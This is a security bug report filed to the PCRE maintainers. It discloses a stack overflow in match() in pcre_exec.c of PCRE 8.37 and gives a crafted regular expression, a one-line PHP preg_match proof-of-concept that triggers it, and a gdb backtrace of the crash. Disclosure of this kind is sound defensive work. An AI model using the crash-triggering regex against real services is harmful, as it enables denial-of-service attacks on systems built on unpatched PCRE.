https://bugs.exim.org/show_bug.cgi?id=1673
Bug ID: 1673 Summary: PCRE Library Call Stack Overflow Vulnerability in pcre_exec.c Product: PCRE Version: 8.37 Hardware: All OS: All Status: NEW Severity: security Priority: medium Component: Code Assignee: p...@hermes.cam.ac.uk Reporter: rubym...@yeah.net CC: pcre-dev@exim.org I. Summary PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP. PCRE library is prone to a vulnerability which leads to Stack Overflow. Without enough bound checking inside match(), the stack memory could be overflowed via a crafted regular expression. ------------------------------------------------------------------ II. Description Latest version of PCRE is prone to a Stack Overflow vulnerability which could caused by the following regular expression. /(?(?=.*b)b|^(?(?=.*b)br^)+)+/ To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP. For pcretest, simply type the regular expression after the re> For PHP, latest version of PHP 5.6.12 (wrapped with PCRE 8.37) could be triggered by following code snippet. <?php preg_match("/(?(?=.*b)b|^(?(?=.*b)br^)+)+/","ADLAB"); ?> Other versions and applications may also be affected. Following test is conveyed under Ubuntu 14.10 x64 with php 5.6.12: ============================================================== (gdb) r poc.php Starting program: /home/bins/php/sapi/cli/php poc.php Program received signal SIGSEGV, Segmentation fault. 0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516 516 { (gdb) bt #0 0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516 #1 0x0000000000620db8 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15850) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:6178 #2 0x00000000005e7c57 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15849) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1541 #3 0x00000000005ef607 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15848) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1388 #4 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15847) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061 #5 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15846) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061 #6 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15845) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061 #7 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15844) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061 ------------------------------------------------------------------ III. Impact Stack Overflow ------------------------------------------------------------------ IV. Affected PCRE 8.37 is confirmed to be vulnerable. PCRE2 is not affected. Other applications may also be affected. ------------------------------------------------------------------ V. Credit Wen Guanxing from Venustech ADLAB is credited for this vulnerability. -- You are receiving this mail because: You are on the CC list for the bug. -- ## List details at https://lists.exim.org/mailman/listinfo/pcre-dev